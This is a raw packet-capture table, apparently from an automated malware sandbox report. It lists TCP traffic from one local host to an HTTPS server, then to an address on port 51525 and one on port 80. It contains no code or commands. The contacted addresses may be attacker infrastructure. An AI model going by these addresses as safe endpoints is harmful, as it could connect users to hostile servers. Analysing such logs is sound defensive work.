                                                                                                                                              Oct 21, 2024 08:34:38.838296890 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.838367939 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.838375092 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838386059 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838418007 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.838427067 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.838603020 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.958621979 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.958682060 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.958709002 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.958762884 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.958781004 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.958796024 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.958817959 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.958920956 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959005117 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959048033 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.959052086 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959062099 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959096909 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.959695101 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959733963 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.959741116 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959770918 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959806919 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959821939 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.959830046 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:38.959845066 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:38.962842941 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.080854893 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081000090 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081026077 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081074953 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081104994 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081244946 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.081255913 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081289053 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081305981 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.081314087 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081327915 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.081346989 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081379890 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.081382036 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081396103 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.081413031 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.081428051 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.081428051 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.082197905 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.082254887 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.125355005 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.125422001 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.125432014 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.125473022 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.200234890 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.200272083 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.200280905 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.200293064 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.200306892 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.200333118 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.200337887 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.200375080 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.200568914 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.200614929 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.201097012 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.201126099 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.201141119 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.201148987 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.201163054 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.201183081 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.320965052 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.321043015 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.321044922 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.321057081 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.321088076 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.321100950 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.321113110 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.321152925 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.321981907 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.322041988 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.322329998 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.322380066 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.365438938 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.365506887 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.443159103 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.443231106 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.443332911 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.443357944 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.443403006 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.443403959 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.443416119 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.443454981 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.444550991 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.444608927 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.485935926 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.486001968 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.562892914 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.562938929 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.562963963 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.562983036 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.562997103 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.563024044 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.563067913 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.563122034 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.563127041 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.563138962 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.563178062 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.563201904 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.606667995 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.606733084 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.606847048 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.606895924 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.683608055 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.683661938 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.683706045 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.683717012 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.683757067 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.683780909 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.684336901 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.684380054 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.684592009 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.684598923 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.684711933 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.727482080 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.727587938 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804337978 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804378986 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804517031 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804517031 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804528952 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804542065 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804573059 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804579020 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804590940 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804593086 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804620028 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804625988 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.804644108 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.804672003 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.805413961 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.805463076 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.848285913 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.848350048 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.848591089 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.848639965 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.925091028 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.925122976 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.925142050 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.925148010 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.925175905 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.925188065 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.925384045 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.925431967 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.925473928 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.925518990 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.926373005 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.926424026 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.969214916 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.969253063 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.969280958 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:39.969288111 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:39.969331980 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.046179056 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.046232939 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.046304941 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.046334028 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.046364069 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.046369076 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.046385050 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.046411037 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.166786909 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.166805029 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.166851044 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.166878939 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.166894913 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.166923046 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.210792065 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.210810900 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.210854053 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.210863113 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.210874081 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.210906029 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.287604094 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.287626982 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.287698984 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.287708044 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.287734985 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.287755013 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.331854105 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.331872940 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.331918955 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.331924915 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.331948042 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.331971884 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.408339977 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.408360958 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.408407927 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.408416986 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.408446074 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.408468008 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.452615976 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.452630997 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.452745914 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.452755928 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.452877998 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.529181004 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.529196024 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.529243946 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.529253960 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.529263973 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.529294968 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.573534012 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.573550940 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.573611021 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.573621035 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.573648930 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.573658943 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.649836063 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.649852991 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.649935007 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.649945974 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.649981976 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.650000095 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.693886995 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.693902969 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.693944931 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.693970919 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.693984985 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.694011927 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.770394087 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.770412922 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.770586014 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.770586014 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.770596981 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.770637989 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.811661959 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.811680079 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.811726093 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.811734915 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.811745882 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.811784029 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.815577030 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.815593958 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.815639973 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.815648079 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.815668106 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.815691948 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.892200947 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.892218113 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.892271042 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.892280102 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.892291069 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.892319918 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.935451984 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.935472012 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.935518026 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.935527086 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:40.935539961 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:40.935569048 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:41.012337923 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:41.012357950 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:41.012567043 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:41.012586117 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:41.012595892 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:41.012618065 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:41.012638092 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:41.012639046 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:41.012684107 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:41.012742043 CEST49737443192.168.2.4172.67.155.139
                                                                                                                                              Oct 21, 2024 08:34:41.012756109 CEST44349737172.67.155.139192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:48.123368979 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:48.128349066 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:48.128424883 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:48.131835938 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:48.137861967 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.116159916 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.174652100 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.311158895 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.318711996 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.323538065 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.323599100 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.328569889 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.328619957 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.333446980 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.714452982 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.783957958 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.798444986 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.803339958 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.843512058 CEST5152549738185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.943896055 CEST4973951525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.950485945 CEST5152549739185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.950568914 CEST4973951525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.953886032 CEST4973951525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:49.959522009 CEST5152549739185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:49.971455097 CEST4973851525192.168.2.4185.236.203.101
                                                                                                                                              Oct 21, 2024 08:34:51.135797024 CEST5152549739185.236.203.101192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:51.139256954 CEST4974080192.168.2.4178.237.33.50
                                                                                                                                              Oct 21, 2024 08:34:51.144962072 CEST8049740178.237.33.50192.168.2.4
                                                                                                                                              Oct 21, 2024 08:34:51.145040989 CEST4974080192.168.2.4178.237.33.50
                                                                                                                                              Oct 21, 2024 08:34:51.145139933 CEST4974080192.168.2.4178.237.33.50
